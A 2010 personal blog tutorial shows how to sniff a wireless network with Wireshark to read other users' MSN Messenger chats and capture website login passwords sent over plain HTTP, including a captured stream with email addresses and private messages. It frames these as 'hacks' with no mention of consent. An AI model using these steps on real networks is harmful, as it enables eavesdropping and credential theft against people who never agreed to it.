Personal Web Space

Packet Sniffing with WireShark

on 6 June, 2010 in Blog | 0 comments

Download and install Wireshark from http://www.wireshark.org/. Launch the application.

Go to Capture -> Options. Select the interface for the wireless network card and tick Capture packets in promiscuous mode. Then press Start.

MSN conversation hack:

Wireshark will start capturing packets that flow around. Among others we notice at the protocol field the MSNMS (Microsoft Network Messenger Service). This is the protocol used for exchanging instant messages between clients in the Microsoft Messenger service.

Each line represents a captured frame and the sniffer logs the sequence in which the packets received, the time, the source, the destination, the protocol and some other information. In the next block we can observe information about the protocol used and at the lower part of the figure we can observe the hexdamp form of the captured frame. Using the Filter field we can concentrate on specific information. By typing MSNMS it will only display the packet of the specified protocol. Right click on the packet you want to sniff and select Follow TCP Stream.  This option does exactly what is says, it follows the specific sequence of packets used in this session.

Select the ASCII option from the bottom right corner of the dialog box. The following is a cut down version of what will appear in the dialog box.

ANS 88 stavros-msn@hotmail.com;{33C41B80-C54D-4FE6-8E31-5362BD8D23A6} 142171146.40169236 1084207748
IRO 88 1 2 lxiasstelios@msn.com;{1cd9c7bd-3e5e-4160-ae5e-9d8766cc6c96} S,TeLi0s 2788999228:136240
IRO 88 2 2 lxiasstelios@msn.com S,TeLi0s 2788999228:136240
ANS 88 OK
JOI stavros-msn@hotmail.com Stavros 2789003324:136240
MSG lxiasstelios@msn.com S,TeLi0s 148
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Microsoft%20Sans%20Serif; EF=; CO=ff0000; CS=0; PF=22
GoodmorningMSG lxiasstelios@msn.com S,TeLi0s 93
MIME-Version: 1.0
Content-Type: text/x-msmsgscontrol
TypingUser: lxiasstelios@msn.com
MSG lxiasstelios@msn.com S,TeLi0s 149
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Microsoft%20Sans%20Serif; EF=; CO=ff0000; CS=0; PF=22
how are you?MSG 89 U 96
MIME-Version: 1.0
Content-Type: text/x-msmsgscontrol
TypingUser: stavros-msn@hotmail.com
..................
 Goddmorning stelios. I am ok and you?MSG lxiasstelios@msn.com S,TeLi0s 93
..................
fine thanks. What did you think of the test we had yesterday?MSG 92 U 96
..................
i thought it wasnt very difficultMSG 95 U 96
..................
 i think i did very weelMSG 97 U 96
...................
sure, that sounds greatMSG lxiasstelios@msn.com S,TeLi0s 93
..................
ok meet there at 730?MSG 105 U 96
..................
ok see you thereMSG 107 U 96
MIME-Version: 1.0
Content-Type: text/x-msmsgscontrol
TypingUser: stavros-msn@hotmail.com
MSG 108 N 124
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Calibri; EF=B; CO=808000; CS=0; PF=22
byeMSG lxiasstelios@msn.com S,TeLi0s 93

As can be seen, along with some extra information, the messages of the conversation can be identified (highlighted with orange colour)!

Website login password hack:

Doing something similar as above we can also obtain the usernames and passwords of users that are trying to log in a website. Instead of selecting MSNMS, we now track HTTP packets. The packets that we should be looking for should have in the Info column, of the main window of Wireshark, the file that the login form is located (e.g. login.php). Then we select Follow TCP Stream as before, making sure that the ASCII is selected at the bottom right corner. Some websites use encryption though so the password will not be displayed in plaintext form.

Plaintext packet

sharecontext.com

Encrypted packet

facebook.com

The username and password are highlighted.

To download the attack in a pdf format click here.

Post a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.